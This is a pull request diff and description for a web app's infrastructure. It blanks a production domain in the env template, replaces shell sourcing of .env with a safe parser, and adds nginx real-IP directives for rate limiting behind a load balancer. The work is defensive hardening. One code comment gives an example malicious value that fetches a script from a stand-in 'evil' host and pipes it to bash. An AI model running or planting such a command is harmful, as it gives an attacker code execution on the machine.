### PR TITLE
[infra] Blank PUBLIC_DOMAIN template, safe .env parse, ALB real-IP

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -123,8 +123,11 @@ LOG_LEVEL=INFO
 CORS_ORIGINS=http://localhost:3000,http://localhost:80
 
 # ── Public domain (used for CORS + security headers in production) ────────
-# Set this to the live domain for production deploys. Leave blank for local dev.
-PUBLIC_DOMAIN=https://archimedes-arc.app
+# Leave BLANK for local dev. Setting it activates production mode (disables
+# /docs, requires EMAIL_ENCRYPTION_KEY at startup, restricts CORS to this
+# domain) — so a verbatim `cp .env.example .env` must NOT inherit it.
+# Production: PUBLIC_DOMAIN=https://archimedes-arc.app
+PUBLIC_DOMAIN=
 
 # ── Semantic retrieval for fusion candidate ranking ───────────────────────
 # When ON, strategy_fusion.select_candidates() uses TF-IDF / embedding-based

--- a/dev.sh
+++ b/dev.sh
@@ -73,11 +73,26 @@ check_prereqs() {
     fi
 }
 
-# Load .env (non-destructive — only sets vars that aren't already set)
+# Load .env (non-destructive — only sets vars that aren't already set).
+# Safe parse: never `source .env` (that executes it as a shell script, so a
+# value like `X=$(curl http://evil/x | bash)` would run). We only export plain
+# KEY=VALUE lines with shell-safe keys.
 load_env() {
-    set -a
-    source "$ROOT_DIR/.env"
-    set +a
+    [[ -f "$ROOT_DIR/.env" ]] || return 0
+    while IFS='=' read -r key value; do
+        # Skip comments and blank lines
+        [[ "$key" =~ ^[[:space:]]*# ]] && continue
+        [[ -z "$key" ]] && continue
+        # Skip keys with shell-unsafe characters
+        [[ "$key" =~ [^A-Za-z0-9_] ]] && continue
+        # Strip one layer of surrounding single/double quotes
+        value="${value%\"}"; value="${value#\"}"
+        value="${value%\'}"; value="${value#\'}"
+        # Non-destructive: only export if not already set
+        if [[ -z "${!key+x}" ]]; then
+            export "$key=$value"
+        fi
+    done < "$ROOT_DIR/.env"
 }
 
 # ─── Redis ─────────────────────────────────────────────────────────

--- a/nginx/nginx.conf
+++ b/nginx/nginx.conf
@@ -1,6 +1,18 @@
+# ── Real client IP behind the ALB ──────────────────────────────────────
+# The ALB terminates TLS and proxies to nginx, so $remote_addr is the ALB
+# node's private IP. Without these directives every client would share one
+# rate-limit bucket (rate limiting effectively disabled). Trust the private
+# VPC ranges the ALB lives in and read the real client IP from X-Forwarded-For.
+set_real_ip_from 10.0.0.0/8;
+set_real_ip_from 172.16.0.0/12;
+set_real_ip_from 192.168.0.0/16;
+real_ip_header X-Forwarded-For;
+real_ip_recursive on;
+
 # ── Rate limiting zones (defense-in-depth behind slowapi) ──────────────
 # These fire even if an attacker somehow bypasses the app-layer rate limiter.
-# 30 requests/minute per IP for API endpoints, 5/min for write endpoints.
+# After the real_ip directives above, $binary_remote_addr is the real client
+# IP, so each client gets its own bucket. 60/min reads, 20/min writes.
 limit_req_zone $binary_remote_addr zone=api_read:10m rate=60r/m;
 limit_req_zone $binary_remote_addr zone=api_write:10m rate=20r/m;
 


### PR DESCRIPTION
## Summary
Audit (findings.md, 2026-06-13) remediation — three infra footguns.

- **.env.example**: leave `PUBLIC_DOMAIN` blank so a verbatim `cp .env.example .env` doesn't silently activate production mode (disables /docs, requires EMAIL_ENCRYPTION_KEY at startup, restricts CORS).
- **dev.sh**: parse `.env` as KEY=VALUE instead of `source`, which executed the file as a shell script (a crafted value = arbitrary code execution).
- **nginx**: add `set_real_ip_from`/`real_ip_header X-Forwarded-For` so rate-limiting keys on the real client IP behind the ALB rather than the shared ALB node IP (which made rate limiting ineffective).

## Verify
- `bash -n dev.sh` → ok
- nginx: `real_ip` directives sit in the http context before `limit_req_zone`; standard nginx images ship `ngx_http_realip_module`.

## Anti-goals
CSP untouched (already tightened in #590). No change to TLS/cert handling or the ALB itself. **Note:** merging deploys the live stack (build-on-deploy) — the nginx change is the only runtime-affecting item here.